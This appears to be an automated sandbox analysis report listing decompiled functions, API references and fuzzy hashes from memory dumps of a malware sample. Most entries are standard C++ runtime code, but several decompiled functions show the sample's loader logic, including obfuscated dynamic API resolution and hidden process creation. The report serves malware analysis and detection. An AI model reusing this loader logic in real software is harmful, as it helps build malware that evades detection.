Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

moneypunct.LIBCPMT ref: 6ED155A2
std::_Facet_Register.LIBCPMT ref: 6ED155B9
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED155D9
Concurrency::cancel_current_task.LIBCPMT ref: 6ED155E6

Strings

H=n, xrefs: 6ED15573

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID: H=n
API String ID: 3376033448-2953257340
Opcode ID: 2a92ad4031bb6218faf15d1d1f56b2562d09bf8d654782269554ea7148e1d1f3
Instruction ID: f3e059fd09275601f2a62ba274fd18167de46e066b95998961eb719d334e6e4b
Opcode Fuzzy Hash: 2a92ad4031bb6218faf15d1d1f56b2562d09bf8d654782269554ea7148e1d1f3
Instruction Fuzzy Hash: 4201C43190451ADBDF05CFE4D944AED777AAF85368F240909E4106B3C0DF78DA46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1526E, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED15275
std::_Lockit::_Lockit.LIBCPMT ref: 6ED1527F
int.LIBCPMT ref: 6ED15296

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

collate.LIBCPMT ref: 6ED152B9
std::_Facet_Register.LIBCPMT ref: 6ED152D0
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED152F0
Concurrency::cancel_current_task.LIBCPMT ref: 6ED152FD

Strings

8=n, xrefs: 6ED1528A

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
String ID: 8=n
API String ID: 1767075461-3139775677
Opcode ID: 516a3e9c1a5f0cea5a273f40fae012f0a9a769a7b3888efed5dff18ecc4be58a
Instruction ID: 87d2a9a5f510a1a2903c98ce72ff372acaf4d380ff588a4eaff86b0ebd650671
Opcode Fuzzy Hash: 516a3e9c1a5f0cea5a273f40fae012f0a9a769a7b3888efed5dff18ecc4be58a
Instruction Fuzzy Hash: B101AD3290461A9BCF058FE4D944AED7779AF81328F240909D4106B290DB749E458BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ED15303, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED1530A
std::_Lockit::_Lockit.LIBCPMT ref: 6ED15314
int.LIBCPMT ref: 6ED1532B

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

messages.LIBCPMT ref: 6ED1534E
std::_Facet_Register.LIBCPMT ref: 6ED15365
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED15385
Concurrency::cancel_current_task.LIBCPMT ref: 6ED15392

Strings

<=n, xrefs: 6ED1531F

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID: <=n
API String ID: 958335874-548695723
Opcode ID: 6a42b7be983d762291a73cb373593b8f769801f9ae08d8c01eeb6e72fe160c35
Instruction ID: 2143471d752e44768826406de27df64485554bf752ee1eb279a523be11f6ab5c
Opcode Fuzzy Hash: 6a42b7be983d762291a73cb373593b8f769801f9ae08d8c01eeb6e72fe160c35
Instruction Fuzzy Hash: B601C03190451A9FCF05DFE4D954AEDB779AF85318F184D09E4106B2D0DFB4DE058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00755F64, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00755F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x75d37c; // 0x2d29818
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00753A69(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x75c1ac;
				}
				_t46 = E007551DA(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E007575F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x75d2e0; // 0x25ca5a8
						_t16 = _t75 + 0x75eb10; // 0x530025
						 *0x75d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00753A69(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x75c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E007575F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00754AAB(_v20);
						} else {
							_t66 =  *0x75d2e0; // 0x25ca5a8
							_t31 = _t66 + 0x75ec30; // 0x73006d
							 *0x75d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00754AAB(_v12);
				}
				return _v24;
			}

0x00755f6c
0x00755f72
0x00755f79
0x00755f7f
0x00755f83
0x00755f87
0x00755f8a
0x00755f8f
0x00755f94
0x00755f96
0x00755f96
0x00755f9f
0x00755fa4
0x00755fa9
0x00755faf
0x00755fb9
0x00755fc2
0x00755fc9
0x00755fe2
0x00755fe7
0x00755fec
0x00755ff5
0x00755ffe
0x0075600f
0x00756018
0x0075601c
0x00756020
0x00756025
0x0075602a
0x0075602c
0x0075602c
0x00756036
0x0075603f
0x00756046
0x0075605e
0x00756062
0x0075609f
0x00756064
0x00756067
0x0075606f
0x00756080
0x0075608c
0x00756094
0x00756098
0x00756098
0x00756062
0x007560a7
0x007560ac
0x007560b3

APIs

GetTickCount.KERNEL32 ref: 00755F79
lstrlen.KERNEL32(?,80000002,00000005), ref: 00755FB9
lstrlen.KERNEL32(00000000), ref: 00755FC2
lstrlen.KERNEL32(00000000), ref: 00755FC9
lstrlenW.KERNEL32(80000002), ref: 00755FD6
lstrlen.KERNEL32(?,00000004), ref: 00756036
lstrlen.KERNEL32(?), ref: 0075603F
lstrlen.KERNEL32(?), ref: 00756046
lstrlenW.KERNEL32(?), ref: 0075604D

Part of subcall function 00754AAB: RtlFreeHeap.NTDLL(00000000,00000000,00755012,00000000,?,?,00000000), ref: 00754AB7

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 01c49610cc35def651ed78c1450d94ac1b0d519d8fb2aaf5903e840ebbc48a3f
Instruction ID: eb459715792778c14f7775db1e296ccaf9f1ea6e7f0fd37d9ef784ab0ac6efe3
Opcode Fuzzy Hash: 01c49610cc35def651ed78c1450d94ac1b0d519d8fb2aaf5903e840ebbc48a3f
Instruction Fuzzy Hash: 20415872900209EFCF22AFA4CC09EDE7BB5EF44355F058054ED04A7261DBB9DA19DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1542D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED15434
std::_Lockit::_Lockit.LIBCPMT ref: 6ED1543E
int.LIBCPMT ref: 6ED15455

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED1548F
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED154AF
Concurrency::cancel_current_task.LIBCPMT ref: 6ED154BC

Strings

D=n, xrefs: 6ED15449

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID: D=n
API String ID: 55977855-3351634183
Opcode ID: a28b420d03dd5b91eae453f3806b74c829b372e4db9b7a49ba52251e52026200
Instruction ID: 240735abb23dc81e08905c02995ccc89b211b87c94a3e76cca6aa320855b4ea3
Opcode Fuzzy Hash: a28b420d03dd5b91eae453f3806b74c829b372e4db9b7a49ba52251e52026200
Instruction Fuzzy Hash: 0401C03190461A9FCF05DFE4D944AEDB77AAF41328F240809E4116B3D0DF749A058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED155EC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED155F3
std::_Lockit::_Lockit.LIBCPMT ref: 6ED155FD
int.LIBCPMT ref: 6ED15614

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED1564E
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED1566E
Concurrency::cancel_current_task.LIBCPMT ref: 6ED1567B

Strings

P=n, xrefs: 6ED15608

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID: P=n
API String ID: 55977855-1602396554
Opcode ID: e22716aabd8bc611ea27c767274b8c2afccb305f4b8c1f06461ce45d71f751e4
Instruction ID: 8d2b017439ffe58535f0887ced79c2f43a7296cbea9e658214657b1d7f88d4c4
Opcode Fuzzy Hash: e22716aabd8bc611ea27c767274b8c2afccb305f4b8c1f06461ce45d71f751e4
Instruction Fuzzy Hash: F401C03190491ADFCF05CFE0D944AED777AAF41368F180909D4106B3D0DF749A068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED15398, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED1539F
std::_Lockit::_Lockit.LIBCPMT ref: 6ED153A9
int.LIBCPMT ref: 6ED153C0

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED153FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED1541A
Concurrency::cancel_current_task.LIBCPMT ref: 6ED15427

Strings

@=n, xrefs: 6ED153B4

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID: @=n
API String ID: 55977855-1549050641
Opcode ID: e1b615704b0336cb170d46ec65372a7a9853c8e494553b4534f9210b24474412
Instruction ID: 7c73be29ac92753f556bee69a2bc5f95e765f8a5487e31da3f8291ef812ad305
Opcode Fuzzy Hash: e1b615704b0336cb170d46ec65372a7a9853c8e494553b4534f9210b24474412
Instruction Fuzzy Hash: B901807191861A9FCF05DFE4E984AED7779AF45728F240909E4106B2C0DF749E05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED078F7, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED078FE
std::_Lockit::_Lockit.LIBCPMT ref: 6ED07908
int.LIBCPMT ref: 6ED0791F

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

std::_Facet_Register.LIBCPMT ref: 6ED07959
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07979
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07986

Strings

|<n, xrefs: 6ED07913

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID: |<n
API String ID: 55977855-311184759
Opcode ID: ec0624f2d0bac7e90f9d35da7ddfc7b58e218d88de4ca26aec3e4bcc75d8ae7c
Instruction ID: c41a5e561f56da07b0efe2c9f0259949159299f0566853ed8db0a85df95fcd99
Opcode Fuzzy Hash: ec0624f2d0bac7e90f9d35da7ddfc7b58e218d88de4ca26aec3e4bcc75d8ae7c
Instruction Fuzzy Hash: 6A01C47190051AABCF05DFE0D944AEDB779AF45318F180809D4106B2C0DF70D905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED42FB2, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON

Download Yara Rule

APIs

Part of subcall function 6ED3F299: GetLastError.KERNEL32(00000000,00000000,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000,00000004), ref: 6ED3F29E
Part of subcall function 6ED3F299: SetLastError.KERNEL32(00000000,6ED8A1A0,000000FF,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000), ref: 6ED3F33C

_free.LIBCMT ref: 6ED432BF
_free.LIBCMT ref: 6ED432D8
_free.LIBCMT ref: 6ED43316
_free.LIBCMT ref: 6ED4331F
_free.LIBCMT ref: 6ED4332B

Strings

C, xrefs: 6ED4310E

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 3256ac52ddc8e4270c172793da6567901e241f917815792de9b92e5e000cfb02
Instruction ID: bc43bbcb15d43dca5e1937ac44c5fae7fc2356435803a898b23728e0c0e99129
Opcode Fuzzy Hash: 3256ac52ddc8e4270c172793da6567901e241f917815792de9b92e5e000cfb02
Instruction Fuzzy Hash: D2C16975A0121ADFDB64CFA8C898A9DB7B4FF19704F1045EAE849A7394D731AE90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00751000, Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00751000(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E00754837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E0075A938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x75d298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x75d2e0; // 0x25ca5a8
					_t18 = _t47 + 0x75e3b3; // 0x73797325
					_t68 = E00752291(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x75d2e0; // 0x25ca5a8
						_t19 = _t50 + 0x75e760; // 0x2d28d08
						_t20 = _t50 + 0x75e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E007534C7();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E007534C7();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x75d270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E00754AAB(_t70);
				goto L12;
			}

0x00751008
0x00751008
0x00751017
0x0075101e
0x00751023
0x00751130
0x00751137
0x00751137
0x00751032
0x0075103a
0x0075103d
0x00751042
0x00751057
0x0075105d
0x0075105e
0x00751061
0x00751067
0x0075106a
0x0075106f
0x00751077
0x00751083
0x00751087
0x00751117
0x0075108d
0x0075108d
0x00751092
0x00751099
0x007510ad
0x007510b1
0x00751100
0x007510b3
0x007510b4
0x007510bb
0x007510d4
0x007510d6
0x007510da
0x007510e1
0x007510fb
0x007510e3
0x007510ec
0x007510f1
0x007510f1
0x007510e1
0x0075110f
0x0075110f
0x00751087
0x0075111e
0x00751127
0x0075112b
0x00000000

APIs

Part of subcall function 00754837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0075101C,?,00000001,?,?,00000000,00000000), ref: 0075485C
Part of subcall function 00754837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0075487E
Part of subcall function 00754837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00754894
Part of subcall function 00754837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 007548AA
Part of subcall function 00754837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 007548C0
Part of subcall function 00754837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 007548D6

memset.NTDLL ref: 0075106A

Part of subcall function 00752291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00751083,73797325), ref: 007522A2
Part of subcall function 00752291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 007522BC

GetModuleHandleA.KERNEL32(4E52454B,02D28D08,73797325), ref: 007510A0
GetProcAddress.KERNEL32(00000000), ref: 007510A7
HeapFree.KERNEL32(00000000,00000000), ref: 0075110F

Part of subcall function 007534C7: GetProcAddress.KERNEL32(36776F57,00755B13), ref: 007534E2

CloseHandle.KERNEL32(00000000,00000001), ref: 007510EC
CloseHandle.KERNEL32(?), ref: 007510F1
GetLastError.KERNEL32(00000001), ref: 007510F5

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: 123163404e9bd79529ba73846aff2b74046852ecf2b244b36a141811d012d6d2
Instruction ID: 60473bd635d1386282663a58fc981216313407faacc53eac8ad382abc351ab41
Opcode Fuzzy Hash: 123163404e9bd79529ba73846aff2b74046852ecf2b244b36a141811d012d6d2
Instruction Fuzzy Hash: 4731537190020CEFDB21AFE4CC89EDEBBB8EB04346F104465EA05A3151D6B89E49CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00751974, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00751974(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x75d2e0; // 0x25ca5a8
				_t1 = _t9 + 0x75e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E007543A8(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E007575F6(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00755601(_t34, _t41, _a8);
						E00754AAB(_t41);
						_t42 = E0075756E(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00754AAB(_t36);
							_t36 = _t42;
						}
						_t43 = E007526DD(_t36, _t33);
						if(_t43 != 0) {
							E00754AAB(_t36);
							_t36 = _t43;
						}
					}
					E00754AAB(_t28);
				}
				return _t36;
			}

0x00751974
0x00751977
0x00751978
0x00751980
0x00751987
0x0075198e
0x00751992
0x00751998
0x0075199f
0x007519a4
0x007519b6
0x007519ba
0x007519be
0x007519c4
0x007519c9
0x007519d9
0x007519db
0x007519f2
0x007519f6
0x007519f9
0x007519fe
0x007519fe
0x00751a07
0x00751a0b
0x00751a0e
0x00751a13
0x00751a13
0x00751a0b
0x00751a16
0x00751a16
0x00751a21

APIs

Part of subcall function 007543A8: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,0075198E,253D7325,00000000,00000000,74ECC740,?,?,00754653,?), ref: 0075440F
Part of subcall function 007543A8: sprintf.NTDLL ref: 00754430

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00754653,?,02D295B0), ref: 0075199F
lstrlen.KERNEL32(?,?,?,00754653,?,02D295B0), ref: 007519A7

Part of subcall function 007575F6: RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

strcpy.NTDLL ref: 007519BE
lstrcat.KERNEL32(00000000,?), ref: 007519C9

Part of subcall function 00755601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,007519D8,00000000,?,?,?,00754653,?,02D295B0), ref: 00755618

Part of subcall function 00754AAB: RtlFreeHeap.NTDLL(00000000,00000000,00755012,00000000,?,?,00000000), ref: 00754AB7

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00754653,?,02D295B0), ref: 007519E6

Part of subcall function 0075756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,007519F2,00000000,?,?,00754653,?,02D295B0), ref: 00757578
Part of subcall function 0075756E: _snprintf.NTDLL ref: 007575D6

Strings

=, xrefs: 007519E0

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: ac524fea153d3341be860e479d4c2466e42070a29ddce79e15170daa13a53d34
Instruction ID: 2bed5768cfc7df45e7bf437fc68cd13c353a0a16ae6a40092f3c8688bdda83b9
Opcode Fuzzy Hash: ac524fea153d3341be860e479d4c2466e42070a29ddce79e15170daa13a53d34
Instruction Fuzzy Hash: 2A11C133501624AB8622B7A59C8DCEE27AD9E857A73058015FE05A7102DEECCD0A87E4

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4D4AB, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6ED4D196: _free.LIBCMT ref: 6ED4D1BB

_free.LIBCMT ref: 6ED4D4F9

Part of subcall function 6ED41434: HeapFree.KERNEL32(00000000,00000000,?,6ED4D1C0,?,00000000,?,?,?,6ED4D4C4,?,00000007,?,?,6ED4B43B,?), ref: 6ED4144A
Part of subcall function 6ED41434: GetLastError.KERNEL32(?,?,6ED4D1C0,?,00000000,?,?,?,6ED4D4C4,?,00000007,?,?,6ED4B43B,?,?), ref: 6ED4145C

_free.LIBCMT ref: 6ED4D504
_free.LIBCMT ref: 6ED4D50F
_free.LIBCMT ref: 6ED4D563
_free.LIBCMT ref: 6ED4D56E
_free.LIBCMT ref: 6ED4D579
_free.LIBCMT ref: 6ED4D584

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
Instruction ID: 91f782e401aa0fc40ea80c77c0b238a593083c44c15b10f1e53154ef40ee3d72
Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
Instruction Fuzzy Hash: 9C112BB1A41B0CEAE620AFF0CC05FCB77ADAF24708F844D55E69DA6091DB75B518CA70

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01C96, Relevance: 10.6, APIs: 7, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED01C9D
std::_Lockit::_Lockit.LIBCPMT ref: 6ED01CA7
int.LIBCPMT ref: 6ED01CBE

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

numpunct.LIBCPMT ref: 6ED01CE1
std::_Facet_Register.LIBCPMT ref: 6ED01CF8
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED01D18
Concurrency::cancel_current_task.LIBCPMT ref: 6ED01D25

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: 2206e521056f459230f0269f3772a33f26dd472c6c66e5ab4bd7d5914c3ad655
Instruction ID: 209ec4e7a70248ff68c1fbe2e6be746ca15072b778cf5b3f53b2d0a20e5522d0
Opcode Fuzzy Hash: 2206e521056f459230f0269f3772a33f26dd472c6c66e5ab4bd7d5914c3ad655
Instruction Fuzzy Hash: 1811AC3190012A9BCB058FE4D944BEDB7B9AF8532CF284818D410AB2C0DF74D90A8BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED076A3, Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED076AA
std::_Lockit::_Lockit.LIBCPMT ref: 6ED076B4
int.LIBCPMT ref: 6ED076CB

Part of subcall function 6ED0207B: std::_Lockit::_Lockit.LIBCPMT ref: 6ED0208C
Part of subcall function 6ED0207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6ED020A6

moneypunct.LIBCPMT ref: 6ED076EE
std::_Facet_Register.LIBCPMT ref: 6ED07705
std::_Lockit::~_Lockit.LIBCPMT ref: 6ED07725
Concurrency::cancel_current_task.LIBCPMT ref: 6ED07732

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 041ff6455c0835fd2a973ce38903d0b0227f93498b1e56b22412e75c0d9cb16f
Instruction ID: 882efe31c9e14b50911744f288b17f74b584d980c9b6a49c65b33255c562a0af
